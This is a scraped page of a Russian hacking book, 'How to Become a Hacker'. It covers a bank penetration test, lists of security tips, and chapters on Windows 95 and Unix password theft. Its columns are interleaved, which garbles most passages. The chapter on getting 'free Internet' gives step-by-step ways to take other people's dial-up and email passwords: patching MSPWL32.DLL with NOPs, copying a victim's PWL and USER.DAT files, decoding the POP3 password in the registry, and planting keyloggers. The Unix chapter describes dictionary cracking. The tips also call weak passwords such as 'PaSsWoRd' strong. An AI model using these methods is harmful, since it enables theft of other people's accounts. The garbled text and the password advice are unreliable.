WWW.DISSERS.RU

БЕСПЛАТНАЯ ЭЛЕКТРОННАЯ БИБЛИОТЕКА

   Добро пожаловать!

Pages:     | 1 |   ...   | 2 | 3 || 5 |

«УДК 004.056 Максим Левин ББК 32.973.202 Л36 Как стать хакером Левин М. ...»

-- [ Страница 4 ] --

в модем и ПК под Remote Server Mode, будет полностью открыта для частности, можно было отправлять почту и записывать файлы в корне вторжения извне.

вой уровень каталога. Таким образом, был получен контроль над этим Воспользовавшись программой автоматического подбора номера, сервером, после чего можно было взаимодействовать с другими сервера «взломщики» обнаружили некоторое число модемов в телефонном про ми на административном уровне.

странстве банка. Они попытались «влезть» в эти модемы и проверить их Далее потребовалось составить себе представление о внутренней защиту. Часть модемных входов была закрыта паролем. Запустив про инфраструктуре сети. Чтобы обнаружить слабые места, «взломщики» грамму подбора пароля, чтобы проверить, насколько сильна эта защита, Хакерские трюки 211 212 Хакерские трюки «взломщики» ничего не добились. Зато им удалось вручную(!) подобрать хакера обслуживание прервется, то, несомненно, пострадают как финан пароль к порту технической поддержки маршрутизатора. Бабах! совые дела BABank, так и его отношения с клиентами. Мало того, следы Web хулиганства на сервере способны «подпортить» имидж самой ком Через этот порт они попали в сеть, а потом, зайдя на AS/400, пе пании, ее продуктов и услуг, в особенности если на деловых страничках ревели небольшую сумму на свой тысячедолларовый счет с чужого счета.

появятся порнографические картинки.

Если «взломщики» сумели это сделать, то что помешает хакеру перевести миллион долларов? Или миллиард? Однако теперь, ориентируясь на Группа «взломщиков» решила выяснить, насколько легко хакер результаты этих изысканий в области психологических приемов, BABank сумеет вызвать на Web сервере BABank перебои в обслуживании. Для установил некую предельную сумму сделки, при превышении которой этого они воспользовались разнообразными самодельными средствами вступают в действие механизмы обнаружения финансового мошенни (ничего другого как то не нашлось). Некоторые разработанные хакерами чества. программы, вызывающие сбои обслуживания, можно загрузить по Internet, однако чтобы заставить их работать, с ними приходится долго Проникнув на AS/400, «взломщики» получили доступ к мэйн возиться.

фреймам и начали атаку на систему защиты Resource Access Control Fa cility. Но тут сотрудники BABank, уже убедившиеся в наличии «дыр» Они применяли почтовые бомбы для переполнения сети, затопле в Web системе, решили прекратить эксперименты. ние сети пакетами синхронизации (SYN flooding), а также «пинг смерти», т.е. нападение с использованием пинг пакетов, иногда приводящее к за Как обычно, «взломщики» победили. Однако на этом их деятель висанию серверов. Обязательно попросите группы оценки информаци ность не закончилась. Был выработан ряд стратегических рекомендаций онной безопасности исследовать устойчивость к искусственным перебо и даны советы по использованию конкретных процедур, методов и тех ям в обслуживании;

такие атаки могут полностью вывести сервер из нологий, которые помогут решить проблемы с защитой данных.

строя. Необходимо также выяснить, сколько времени занимает восста новление работоспособности системы.

Так, банку были даны рекомендации по выработке политики в об ласти Web безопасности и реализации метода поиска слабых мест. Кро ме того, было указано, как можно связать между собой различные схемы Экзамены никогда не кончаются парольной защиты и добиться оптимального выбора паролей. Был дан Когда нанятым хакерам удалось взломать систему, ваша работа совет сотрудникам отдела автоматизации установить новые версии неко только начинается. Ни в коем случае не следует считать, что сам факт те торых операционных систем и перевести определенные системы с Unix стирования уже обеспечивает информационную безопасность. Оценка на Windows NT, поскольку ряд приложений лучше работает под NT.

системы безопасности (вроде той, что была предпринята по заказу BABank) дает только представление о состоянии сети на момент прове Главное изменение состояло в том, чтобы вывести часть услуг на дения операции. Cистема информационной безопасности претерпевает отдельные серверы, повысив тем самым степень защиты. Если услуги ти постоянные изменения и требует к себе постоянного внимания.

па FTP и размещения Web серверов сосредоточены на одной машине, это снижает уровень информационной безопасности.

Первый всеобъемлющий тест должен рассматриваться вами как отправная точка. Не забывайте время от времени выделять деньги на по Фоллсворт, впрочем, оказался достаточно разумным, чтобы осо вторные обследования. Не менее важно и то, чтобы исследования прово знать: одних этих мер недостаточно для обеспечения неуязвимости ин дились до запуска онлайновых услуг, а не после того, как «дыры» в защи формационной системы банка. Было проверено, как защищена конфи те дадут себя знать.

денциальность информации, насколько хорошо обеспечивается целостность данных и как устроена система управления доступом, одна Не забывайте девиз «Взломай свою систему сам, пока кто то не ко из рассмотрения выпал такой важнейший аспект информационной сделает этого без твоего ведома». А пока — удачной охоты!

безопасности, как готовность системы.

BABank намеревался предоставлять Internet услуги для получения дополнительного дохода и укрепления доверия клиентов. Для этого сер вер должен работать без перерывов и выходных. Если в результате атаки Хакерские трюки 213 214 Хакерские трюки применять такие средства обеспечения безопасности, как Secure Socket Десять советов по защите серверов для Layer, Secure Hypertext Transfer Protocol или Kerberos.

Web коммерции 10. Подумайте, не стоит ли снабдить критически важные данные 1. Следует ограничить число людей, имеющих удаленный доступ и соответствующие им системные файлы оболочками для обеспечения к управлению вашим Web сервером, и тщательно следить за этим досту их целостности. Криптографические оболочки вокруг этих файлов поз пом. Дистанционное администрирование (как и доступ к корневому ка волят не допустить их модификации или внесения вредоносного кода.

талогу) — отличная лазейка для хакера.

2. Проверьте, правильно ли сконфигурированы списки доступа Как работать с группой, оценивающей и вносятся ли в них каждодневные изменения, отражающие состояние надежность системы информационной деловой жизни компании (такие, например, как добавление новых поль зователей и клиентов, удаление старых ). безопасности Выберите себе консультанта с хорошей репутацией.

3. Насколько возможно, отделите ваш коммерческий сервер от прочих услуг. Можно дополнительно укрепить сервер, отменив все не Потребуйте, чтобы в группе велись подробные обязательные функции приложений и операционных систем. Если вы не контрольные журналы в течение всего срока работ.

в состоянии этого сделать, следует всерьез подумать об использовании Необходимо, чтобы группа оценки могла приостановить сторонних услуг (outsourcing).

свою деятельность за несколько минут, если начнет 4. Установите систему обнаружения вторжений, которая не происходить нечто нежелательное.

медленно будет ставить в известность администратора сети обо всех Группа должна выдать несколько различных отчетов, проблемах, требующих устранения. Помните, что обнаружить хакера — рассчитанных на технических специалистов, это полдела;

главная задача состоит в пресечении его деятельности.

руководителей среднего звена и высшее руководство 5. Система должна реагировать на любые необычные события, компаний.

происходящие на серверах. Невозможно остановить злоумышленника, Ознакомьтесь с результатами проверки и используйте не зная, что он делает.

их как руководство к действию.

6. Неправильно написанные, сконфигурированные и установлен ные скрипты Perl и CGI (Common Gateway Interface) могут стать причи Десять недорогих способов укрепления системы ной возникновения «дыр» в системе защиты. Этими средствами надо обеспечения внутренней безопасности пользоваться осторожно;

все скрипты должны проверяться опытными 1. Стоит выяснить о нанимаемых на работу людях несколько боль специалистами.

ше, чем можно узнать из их резюме;

особенно это касается таких крити 7. Для обеспечения безопасности некоторых коммерческих серве чески важных должностей, как системный администратор. Подумайте, ров использования паролей недостаточно. Стоит обдумать возможность не надо ли ввести систему психотестов, которые позволят выявить этиче раздачи клиентам физических и электронных жетонов.

ские принципы кандидатов, их особенности.

8. Следует обеспечивать и аутентификацию администраторов.

2. Рассмотрите вопрос о снятии дисководов с пользовательских Все большее распространение получают разнообразные биометричес ПК. Это затруднит сотрудникам установку своего собственного про кие средства идентификации по голосу, отпечаткам пальцев и узору сет граммного обеспечения и компьютерных игр, помешает им заражать си чатки.

стему вирусами и «выносить» из компании закрытую информацию. Та кая мера позволит избежать и еще одной угрозы для информационной 9. При переводе денежных сумм (с использованием кредитных безопасности — диски, разбросанные на столе сотрудника, легко могут карточек или путем обращения к мэйнфрейму, где поддерживаются пол пропасть.

номасштабные банковские операции) ваш узел обращается к другим се тям. При взаимодействии с критически важными системами следует Хакерские трюки 215 216 Хакерские трюки 3. Не допускайте, чтобы на одну сетевую станцию приходилось Пять основных условий обеспечения более одного идентификатора пользователя. Установите безопасные эк информационной безопасности ранные заставки — это поможет решить административные проблемы.

1. Главное, что нужно сделать для защиты информационной сис 4. Предоставляйте корневые привилегии только тем администра темы от внешних и внутренних угроз, — выработать корпоративную по торам, которым они реально нужны. Помните, что каждый раз, когда вы литику. Обдумайте, чего вы хотите добиться и как можно достичь постав даете такие привилегии, в системе защиты появляется еще одна потен ленной цели;

составьте ясный документ, посвященный политике циальная «дырка».

защиты.

5. Уничтожайте или сжигайте важную закрытую информацию:

2. Регулярно проводите занятия с сотрудниками, повышая их об списки персонала, идентификационные имена сотрудников, сводки от разовательный уровень и степень информированности обо всех аспектах дела кадров, папки с данными о клиентах, памятки, руководства, схемы информационной безопасности компании. Объясняйте сотрудникам, в сетей и вообще все, что может представлять интерес для злоумышлен чем могло бы состоять их участие в обеспечении информационной безо ников.

пасности компании.

6. Мусорные контейнеры должны находиться на территории орга 3. Периодически проводите тестирование и оценку системы защи низации;

в противном случае злоумышленник не устоит перед соблаз ты, чтобы проверить, насколько внешняя и внутренняя защита соот ном в них порыться.

ветствует корпоративной политике. Работайте только с теми консультан тами, которые придерживаются структурированного подхода и не 7. Постарайтесь, чтобы сотрудники компании стали вашими со заинтересованы напрямую в результатах тестирования.

юзниками в борьбе за корпоративную безопасность. Попробуйте реали зовать программы партнерства: пообещайте вознаграждение тому, кто 4. Не забывайте о простых способах физической защиты. Следите обнаружит недочеты в системе безопасности или уличит кого либо в не за доступом к распределительным шкафам, серверам, комнатам теле добросовестности.

фонной связи и кроссам точно так же, как вы следите за доступом к вы числительным центрам.

8. Внимательно изучайте все продукты, обеспечивающие инфор мационную безопасность. Убедитесь, что они работают именно так, как 5. Рассмотрите вопрос об использовании услуг сторонних компа было обещано производителем. Подумайте, можно ли укрепить систему ний, специализирующихся в области защиты данных;

они должны рабо защиты, не устанавливая новый продукт, который потребует от вас опре тать в контакте с отделом автоматизации. Эти компании могут оказаться деленных усилий.

лучше подготовленными к тому, чтобы следить за защитой ваших дан ных 24 часа в сутки без выходных. Однако тогда вам придется передать 9. Уполномочьте кого либо из сотрудников принимать оператив в чужие руки управление определенной частью своего бизнеса.

ные меры в случае угрозы информационной безопасности — от аварий ной остановки Web сервера до вызова охраны для удаления проштра Десять способов поддержки работоспособности фившегося сотрудника за пределы организации.

системы защиты 10. Оповестите сотрудников, что вы используете самые современ 1. Время от времени проводите тестирование систем защиты — это ные средства мониторинга сети и контроля за действиями работников позволит отслеживать все изменения в самих системах, сетях и поведе компании. Объясните, что вы не собираетесь устанавливать тоталитар нии пользователей. Точечные проверки системы защиты данных пред ный режим, а просто боретесь со злоумышленниками. В результате со приятия стоит проводить ежемесячно, а полную проверку информаци трудники будут с меньшей легкостью нарушать правила пользования ин онной безопасности предприятия — раз в год. Возможное влияние новых формационной системой и обеспечения защиты данных.

приложений на информационную безопасность следует оценивать перед их установкой.

2. Постоянно проверяйте надежность парольной защиты, даже ес ли ничто не внушает беспокойства. Длинные пароли лучше коротких, Хакерские трюки 217 218 Хакерские трюки поскольку их труднее подобрать, однако их и труднее запомнить, не за поддержания корпоративной информационной безопасности, которая писывая. Вот примеры хороших паролей: PaSsWoRd (чередующиеся соответствовала бы потребностям вашего бизнеса.

прописные и строчные буквы), ford6632 (распространенное слово и лег ко запоминающееся число), 3lite, wr1t3m3, w1nn13 (так пишут хакеры).

Сигнал тревоги В настоящее время ФБР расследует более 700 случаев крупных 3. Следите за тем, как ваши пользователи работают с Internet, и ре вмешательств со стороны иностранных разведок. Среди применяемых гулируйте этот процесс.

агентами методов — подключение к кабельным линиям связи, установка 4. В рамках программы непрерывного образования предложите подслушивающих устройств в офисах, перехват разговоров по сотовому сотрудникам ознакомиться со специальными играми и моделирующими телефону, проникновение в компьютерные сети и воровство закрытой программами, которые позволят им осознать, какие последствия может информации с дисков и компакт дисков.

иметь пренебрежение правилами защиты данных.

По данным Национальной ассоциации компьютерной безопасно 5. За счет использования механизмов управления доступом и тех сти, за период с 1996 г. по ноябрь 1997 г. количество макровирусов воз нологий для интрасетей разделите вашу организацию на логические час росло с 40 до 1300. Gartner Group предсказывает, что в 1998 г. 60% нару ти. Секционирование ресурсов и информации повышает степень защи шений системы защиты произойдет из за вирусов.

щенности. Подумайте также об использовании закрытой почтовой Иностранные агенты минимум из 23 стран пытались осуществить системы, ограничивающей возможность обмена информацией между разведывательные действия против американских корпораций. По дан сотрудниками.

ным ФБР, только в 1997 г. потери американских компаний, связанные 6. Станьте подписчиками новостных групп Internet, посвященных с интеллектуальной собственностью, составили свыше 300 млрд. дол.

проблемам безопасности, и просматривайте основные Web страницы;

По данным министерства обороны США, 88% из более чем 20 это позволит вам постоянно быть в курсе событий. Вот некоторые полез попыток проникновения в информационные системы государственных ные URL: listservnetspace.org, www.nbugtraq.com, www.infowar.com/hack организаций, выполненных для оценки надежности защиты, заверши ers, www.techbroker/happyhacker.html.

лись успешно. Из этих успешных нападений обнаружены были только 7. Немедленно устанавливайте все новые версии операционных 5%;

официальные же доклады о проникновении представлялись только систем, «заплаты» к прикладным программам и комплекты сервисов, в 5% от общего числа случаев выявления атак. Таким образом, широкой выпускаемые производителем программного обеспечения. Тщательно общественности становится известно лишь об одной из 400 успешных проверяйте, не окажет ли новая программа негативного воздействия на атак.

другие системы.

Как показало исследование, проведенное компанией Warroom 8. Создайте из сотрудников вашей компании оперативную группу Research совместно с американским Сенатом, 58% компаний обнаружи компьютерной безопасности (Computer Emergency Response Team, вали случаи несанкционированного доступа к своим сетям. Более чем в CERT). CERT — это общепринятый термин для обозначения группы 69% случаев успешных вторжений убытки компаний составили свыше экспертов по компьютерным технологиям, которые призваны бороться с 50 тыс. долларов, а более чем в 27% случаев — свыше 500 тыс. долларов.

компьютерными и сетевыми катастрофами. Установите контакты с груп Исследование, проведенное компанией Warroom Research, пока пами CERT из родственных организаций, что позволит поддерживать ус зало, что каждая из более чем 51% компаний уличала не менее шести сво тойчивость системы защиты в более глобальном масштабе.

их сотрудников в злоупотреблениях, связанных с информационными се 9. Просматривайте списки прав доступа пользователей и следите тями. Более чем в 75% случаев единственным наказанием стало устное за их актуальностью. Ограничивайте пользователям возможности досту или письменное порицание.

па;

максимально закручивайте все гайки в системе безопасности.

10. Рассматривайте защиту данных как процесс. Не следует ду мать, что, установив систему защиты данных, можно поставить галочку в списке необходимых дел и на этом успокоиться. Разработайте политику Хакерские трюки 219 220 Хакерские трюки чего ушли, к тому и пришли! И тогда какая то умная голова догадалась, Глава 17.

что пароль можно хранить не в голове, а прямо на жестком диске.

Бесплатный Internet В DialUp окне галочку поставить и запомнить пароль. У компьютера мозги кремниевые — ему все равно, что запоминать. Ну, а раз запомни Все изложенное ниже предназначено только для ознакомления ли, то, само собой, и записать надо. Ну, а раз записать, то... правильно:

с возможной опасностью и ни в коем случае не должно быть использова отвернулся наш пользователь, а тут хакеры толпой налетели — и ну па но, если это причинит ущерб каким либо физическим или юридическим роль подсматривать. И тогда запомненные пароли стали шифровать... Ну лицам, так как это может повлечь за собой административную или уго вот, наше лирико историческое вступление закончилось. Теперь пошла ловную ответственность в соответствии с действующим законодатель проза.

ством.

Где хранятся пароли в Windows 95? Зашифрованные пароли Для начала небольшой экскурс в историю. Во все времена были в Windows 95, как известно, хранятся в основном каталоге, в файлах с люди, которые старались что либо утаить от других, и были и другие: те, расширением PWL. С учетом того, что не только «у нас здесь», но и «у которые с этим были не согласны и поэтому всячески старались тайны них там» бывают персональные компьютеры коллективного пользова первых узнать — такова уж человеческая сущность. И вот, придумали ния, да и сети локальные местами встречаются, на каждого пользователя первые вход в Internet с паролем, ибо денег стоит, а вторые сразу начали заводится свой PWL. Кстати, название файла соответствует логину (име этот пароль отыскивать всеми возможными и невозможными спосо ни... нет, скорее, кличке) данного пользователя.

бами.

Зашифрованы эти файлы, в принципе, достаточно прилично. Ес Итак, стадия первая. Были времена, когда пароль пользователь ли кому либо интересно, то, взяв в руки какой нибудь дизассемблер мог выбирать сам. Безусловно, с одной стороны, это было удобно: если (HIEW, QVIEW), можно посмотреть процедуру шифрования. Она нахо сам слово это заветное придумал, то уж не забудешь никогда (если толь дится в файле MSPWL32.DLL. В версии OSR2pus со смещением ко пребывал в этот момент в здравом уме и твердой памяти, но это уже к 488(hex).

делу не относится). Пароль же выбирался не просто так: для указанного Вот уж где накручено. Имеется счетчик (назовем его N) от нуля до пользователя он обычно нес определенную смысловую нагрузку.

«сколько надо». Имеются три таблицы. В соответствии со счетчиком N, И в этом было слабое место данного метода.

берется байт из первой таблицы (X). По смещению X+N, урезанному до Теперь только в дешевых фильмах увидишь некоего гражданина, 8 бит, из второй таблицы берется другой байт (Y). Затем по адресу X+Y, копающегося в мусорной корзине своей будущей жертвы в надежде уз опять же урезанному до 8 бит, из третьей таблицы берется третий байт нать имена, фамилии, даты рождения всех родственников таковой (Z). После столь хитрых манипуляций командой XOR с байтом Z шиф вплоть до десятого колена, а также всех их собак, кошек, крыс, хомяков руется байт информации, после чего счетчик инкрементируется, и все и прочей живности. И не без успеха! А как же еще: а что вам, например, повторяется сначала.

первым приходит на ум? Конечно: имя вашей (или не вашей) подруги Кстати, таблиц, на самом деле, может оказаться и две, и одна (ис или кличка вашей собаки, ну, или слово какое, непотребное (но это уже пользуются несколько раз на разных этапах). Расшифровывается все это от воспитания зависит!). Наиболее продвинутые хакеры начали даже со аналогично (и той же процедурой), ибо команда XOR обратима.

ставлять специальные словари с учетом наиболее часто встречающихся в паролях слов.

Если же у вас стоит какая то другая версия Windows, то это дела не меняет. Неизвестно, в чьих нездоровых мозгах могла появиться Все это, в конце концов, положило конец первой стадии, и нача мысль использовать для шифрования команду хоr byte ptr [eax+ebp],cl.

лась вторая: теперь пароль выдает компьютер, то есть генерирует некото Может, запутать хотели? А команда уникальна, такие команды в обыч рую псевдослучайную последовательность букв, цифр и разных знаков ных программах еще поискать надо. Стало быть, ищем соответству препинания. Хорошо то как стало: «tHa73?Lp» — поди ка подбери! Но ющую ей комбинацию 30h, OCh, 28h — и все дела. Дальше — просто. Бе тут возникла другая проблема: а поди ка запомни! Пользователи наши рем MSPWL32.DLL и со смещения 511 h (или там, где найдем) ставим начали их на бумажках записывать, ну и, периодически... правильно: бу 90h, 90h, 90h — команды NОР (пустая операция). И все, команда не вы мажки терялись, похищались, попадали в мусорную корзину и т.д. — от полняется!

Хакерские трюки 221 222 Хакерские трюки Что при этом произойдет? Да ничего! Ничего страшного и даже не Я все так и сделал, скажете вы, а вот тот User в Windows с паролем очень страшного. И даже никто ничего не заметит!!! Все останется как входил, а мне теперь не войти — пароля то я не знаю. Что делать? Не бе всегда, с одним лишь исключением: все логины/пароли будут видны, так да! Есть способ проще! Уносим только USER.DAT! А теперь еще раз:

сказать, невооруженным глазом! Тут, правда, есть два неприятных Windows'95 — MustDie!

момента. Во первых, во время работы Windows вам не удастся подобным Как вам известно, кроме интерактивного доступа в Internet, про образом надругаться над их «святая святых»: писать в этот файл нельзя.

вайдеры предлагают еще и e mail. Так вот, чтобы залезть в ваш почтовый Значит, придется перегружаться в режиме эмуляции MS DOS, а это ящик, в тот, что у вас на лестнице, нужен ключ (или лом). Чтобы залезть лишнее время, которого может не быть. Во вторых, а это еще хуже, вам в ваш e mail, нужен пароль (или виртуальный лом). И тут можно сказать:

надо будет стереть все PWL'ы, иначе даже в Windows не пустят: а вот тут пароль к РОРЗ ящику всегда тот же, что и DiaIUp!

у законных пользователей могут возникнуть лишние вопросы и подо зрения.

Ну и что? А вот что: пароль e mail находится не в PWL'e, а в USER.DAT, и зашифрован он не так сильно, вернее, почти совсем не А можно проще? Без дизассемблеров и «насильственных дей зашифрован!

ствий»? Можно! И вот здесь мы скажем то, за что (и за многое, увы, дру гое) Windows 95 иначе как MustDie по праву никто не называет.

А это как? А вот как! Метод «шифрования» напоминает UUE ко дирование, иначе говоря, из трех байтов делают четыре или из восьми Вы, наверное, думаете, что пароли расшифровываются только то битов — десять. Весь исходный пароль разбивается на части по три бай гда, когда это надо, а затем «выжигаются» из памяти «каленым желе та. В результирующей строке на один символ отводится 10 битов. Те зом»? — ну вот еще... Открытые пароли постоянно хранятся в системе — перь: к каждому байту исходной строки прибавляется 30h, если сумма с момента входа в Windows данного пользователя и до момента его выхо больше, чем 7Ah, то он становится равен 30h, а к паре 9 и 10 битов добав да! Вот вам и безопасность. Но этого мало: они доступны любым прило ляется единица. Однако есть исключения. Если общая длина строки па жениям через API Windows. И вот результат: появляется программа роля не кратна трем, то она дополняется байтами 3Dh. Судя по всему, PWLVIEW, которая спокойно показывает вам «всю подноготную» вашей это ODh (конец строки)+30. В конце строки ODh, OAh: стандартное за (или не вашей) машины. В том числе и DiaIUp, и сетевые пароли. Фор вершение.

мат выдаваемой информации таков:

Как правило, подобрать пароль вручную проще, чем написать со Rna\1 e соединение\1 й логин 1 й пароль ответствующую программу: не каждый же день вы эти пароли подбира Rna\2 e соединение\2 й логин 2 й пароль ете! Принцип прост: запускаем Internet Mail, заходим в Сообщение Па и так далее.

раметры Сервер. Запускаем REGEDIT, переходим в Да, это все хорошо, но она работает в окне DOS, а это... унизитель HKEY_CURRENT_USER Software Microsoft InternetMail and News но: мелкий шрифт, белым по черному... А нет ли еще чего нибудь, ближе Mail POP3 <Ваш сервер>: смотрим Password.

и роднее? Есть. Есть еще одна штука, PEEPER называется. Эта идет еще Удаляем пароль в Internet Mail. Первый подбираемый символ вли дальше. Пароль, как вы можете заметить, не показывается, вместо него яет на первый и второй байты, второй — на второй и третий, третий — на звездочки. Так вот: запускаем PEEPER, запускаем соединение, наводим третий и четвертый. Теперь: подбираем символ так, чтобы первый байт мышь на звезды и в окне PEEPER видим... правильно, открытый пароль.

совпал с оригиналом, а второй или совпал, или был самый большой, но Вы скажете: у меня нет ни времени, ни возможности ковыряться в меньше оригинала. Аналогично для второго и третьего символов. С под чужой машине, нельзя ли стянуть у соседа этот самый PWL, а потом, до бором третьего символа все четыре байта должны совпасть! Если нет — ма, разобрать? Можно, только это вам ничего не даст: не будет он у вас извините, вы ошиблись. Естественно, после каждой замены символа на работать. Вернее, он один не будет. Нужно унести еще и USER.DAT. По жимаем «Применить». Результат контролируем REGEDIT'ом, переходя сле чего дома «создать» User'a с именем из PWL, заменить свой выше/ниже для обновления информации. Когда первые три символа по USER.DAT на цельнотянутый и еще добавить в Windows тянутый PWL. добраны, возвращаемся для следующих трех, и т.д. до конца. Разумеется, После чего войти в Windows под соответствующим именем и... дальше байт(ы) 3Dh подбирать не нужно! После некоторой тренировки на все в игру вступает PWLVIEW. это уходит меньше 15 минут.

Хакерские трюки 223 224 Хакерские трюки А где это счастье хранится? И, кстати, ведь кроме логина и пароля, на такую мелочь, а другие в лучшем случае могут подбирать пароли по еще многое нужно знать, а откуда, не звонить же провайдеру? Не надо словарю, а это бесполезно, в худшем — над вами просто хотят посмеять никому звонить! Все в нем, в USER.DAT. ся или, того хуже, сделать вам гадость (прецеденты уже были).

HKEY_CURRENT_USER RemoteAccess Addresses: и мы имеем список подключений. Да, но там ничего не понятно, цифирь...

Глава 18.

Правильно! Выбираем байт, которого больше всего, и дешифруем Паpоли в UNIX'e им все остальные (обычный ХОR). В результате в куче всякой ерунды по лучаем ASCII строку с номером модемного телефона провайдера.

Файл паpолей в UNIX'e — это /etc/passwd, пpичем маленькими буквами, если кто не в куpсе.

HKEY_CURRENT_USER RemoteAccess Profile <подключе ние> IP: со смещения OCh четыре байта задом наперед — первичный Если вместо паpолей стоят *, это значит: либо нет входа по этим DNS, затем еще четыре — вторичный и т. д.

паpолям, либо паpоли оттенены — shadowed. Тогда паpоли хpанятся в файле /etc/shadow или /etc/master.passwd, котоpый недоступен для чте HKEY_CURRENT_USER RemoteAccess Profile <подключе ния. Есть ваpианты, когда в поле паpоля стоит текст типа «##root», ние> User: логин.

«##egor», то есть имена пользователей — тогда зашифpованный паpоль HKEY_CURRENT_USER Software Microsoft Windows беpется из /etc/shadow или master.passwd по соответствующему пользова CurrentVersion InternetSettings ProxyServer: Proxy сервер и порт.

телю. То есть если логин egor имеет запись в поле паpолей «##quake», тогда его паpоль беpется из поля паpоля в файле passwd пользователя HKEY_CURRENT_USER Software Microsoft Internet Mail and quake. То есть это пpосто ссылка. В таких системах (напpимеp, Minix) от News Mail: DefaultPOP3Server:

тенение паpолей является pодным.

DefaultSMTPServer:

Файл паpолей, котоpый вы можете ftp`нуть — это фейк. FTP ката SenderEMail:

лог фоpмиpуется так:

/home/ftp/bin Name:

/home/ftp/etc Organization: это все и так понятно.

/home/ftp/pub /home/ftp/....

POP3 r <РОР3 сервер>:

Когда вы телнетитесь на поpт 21 (или делаете ftp), то для вас Account: это понятно.

коpнем становится каталог /home/ftp/ удаленной машины. А на ней в Password: ну, вот и он, родимый. /home/ftp/etc есть и файл гpупп — group и файл passwd, котоpые являют ся, по сути, фейком.

А что делать, если пользователь — мазохист? Т.е. хранит пароли в компьютере, а вводит их каждый раз с клавиатуры? И этому горю мож Паpоли в Юниксе шифpуются так: salt+паpоль зашифpовывается но помочь. Существуют программы типа SPYWIN или HOOKDUMP. по ключу паpоль.

Они записывают все действия, производимые на компьютере. Достаточ Таким обpазом, если мы вводим себе паpоль «doomii», то отфо но подсадить одну из них и... если вам потом не лень будет разбирать те наpно генеpится salt (две буквы) и пpоизводится такая зашифpовка:

десятки килобайт, которые будут порождены этими шпионами. Есте «.i» — salt, «doomii» — то, что шифpуется, и «doomii» — ключ. Шифpовка ственно, их можно использовать и для других целей.

осуществляется алгоpитмом DES. salt — это две буквы, специальная В заключение можно сказать следующее: не берите и уж тем более пpимочка для хакеpов — они генеpятся отфонаpно в момент шифpовки.

не запускайте у себя всякие «крякеры Internet`а», почерпнутые с BBS и из Таким обpазом, исключается написание компилятоpов словаpей — FIDO. Они могут «крякнуть» только информацию на вашем винчестере! пpогpаммы, котоpая бы один pаз зашифpовала весь файл паpолей, и Ибо тот, кто может взломать провайдера, никогда не будет распыляться пеpебоp длился бы приблизительно 1 сек. Итак, мы пpишли к тому, что Хакерские трюки 225 226 Хакерские трюки функция шифpования является одностоpонней. Когда пользователь пpи Фоpмат /etc/shadow aka /etc/master.passwd:

входе вводит паpоль, читаются две буквы из файла паpолей — пеpвые две login:password буквы зашифpованного паpоля — salt. По ним пpоизводится та же Тепеpь ближе к теме: как ломать. Ломать паpоли статистическим опеpация, что и выше, только salt`ом являются эти две буквы. После методом нельзя — давайте вычислим скоpость pаботы. Итак, шифpования зашифpованный текст сpавнивается. И если он совпадает, 127 – 32 символа = 95. Тепеpь 95^количество_букв. Как пpавило, 8. Это то это либо юзеp, либо хакеp. Паpоль может состоять из: 32 127. По 95*95*95* 95*95*95*95*95 =.....

опpеделению — не коpоче 6 символов, не длиннее 8.

Тепеpь смотpите. Зашифpовка 2000*8 байт длится на 486dx4 Hо. Hекотоpые Юниксы пpопускают паpоли любой длины до около 900 ms — то есть секунда — это 2100*8 байт. Если мы pазделим 95^ 8 символов, а некотоpые — до 16.

на (2100*8) — мы получим количество секунд для полного пеpебоpа всех Как пpавило, когда вы pешаете менять свой паpоль, Юникс ваpиантов одного логина. Hо это на 486dx4 120 — около двух лет!!! Так пpовеpяет пpиведенный паpоль на следующие вещи: чтобы все буквы не что этот метод отбpасывается напpочь.

были одного case а и чтобы это не было слово. Юникс пpошаpивает у се Hо ломают же как то ? Пpосто. Brute force метод — метод словаpя.

бя словаpь (около двух метpов, как пpавило) на тему: а не ввел ли юзеp Мы имеем словаpь английских слов, котоpый и пеpебиpается. Больше обычное слово. И такие паpоли отвеpгает. Есть еще некотоpые нюансы, словаpь — больше шансов.

по котоpым он опpеделяет, что паpоль слишком пpост для взлома — напpимеp, если все цифpы. Этого всего не пpоисходит, если паpоль вво Многочисленные пpогpаммы brute force кpэкинга умеет извpа дит root — пpедполагается, что pут может делать все, что хочет, в т.ч.

щать слова из словаpя по ходу кpэкинга.

и вводить пpостые паpоли.

Таким обpазом, когда попадается в словаpе слово «spaces», то Фоpма файла паpолей такова:

пpогpамма пpовеpяет: «spaces», «Spaces», «SPACES», «SpaceS», «spaceS», ну, и т.д.

login:password:UID:GID:comments:home:shell где Пpактика показывает, что пеpебоp, скажем, пяти логинов длится по словаpю с использованием максимального извpащения пpи словаpе в login: имя логина, напpимеp, egor, vasya или root. Кстати, pут, как 800 килобайт около получаса часа. Если с минимальными извpащения пpавило, не может дистанционно залогиниться на машину.

ми, т.е. совсем без оных, — около полутоpа минут на логин.

password: паpоль в том самом зашифpованном виде. Hапpимеp:

salt — это две буквы, специальная пpимочка для хакеpов — они ге «piGH5\fh32IjPb» — это поле, как пpавило, 13 символов. Также тут со неpятся отфонаpно в момент шифpовки. Таким обpазом, исключается деpжатся подполя, котоpые используются для опpеделения возpаста написание компилятоpов словаpей — пpогpаммы, котоpая бы один pаз паpоля — если он, скажем, достаточно стаp, то Юникс потpебует его сме зашифpовала весь файл паpолей, и пеpебоp длился бы приблизительно нить, или не даст сменить, если пароль недостаточно стаp. Как пpавило, 1 секунду.

такую фичу не используют.

Возможно, вас это удивит, но такой подход все pавно использует UID: User ID. Hомеp пользователя для файловой системы.

ся (напpимеp, в QCrack от Crypt Keeper). 4096 pазличных salt'ов — не так GID: Group ID. Hомеp гpуппы для файловой системы. много. Тем более если учесть, что достаточно хpанить по одному байту от шифpованных слов (т.е. получаем 4 Kb на слово), т.к. можно использо Comments: Как пpавило, имя пользователя. Также есть подполя, вать такой алгоpитм пеpебоpа: если пеpвый байт шифpованного паpоля в котоpых указывается офис, номеp телефона офиса, дома и т.д.

не совпадает — к следующему, если совпадает, ну, ничего не поделать — вызов crypt(). Получаем быстpодействие в 256 pаз выше, чем в обычных home: домашний каталог. Это отдельная файловая система, ко wordlist кpэкеpах ценой pазмеpа wordlist'а, котоpый увеличится тоpая монтиpуется как /usr, где подкаталог egor, скажем, является для пpимеpно в 500 pаз. Так что можно взять wordlist где нибудь на мегабайт, меня домашним. Либо домашний каталог может относиться к /home.

один pаз зашифpовать, записать на CD ROM и пpодавать.

shell: шелл для логина. Как пpавило, /bin/sh.

Хакерские трюки 227 228 Хакерские трюки сто редактирование исходного кода и последующая перекомпиля Глава 19.

ция) — разве было бы возможно существование защит вроде VBox?

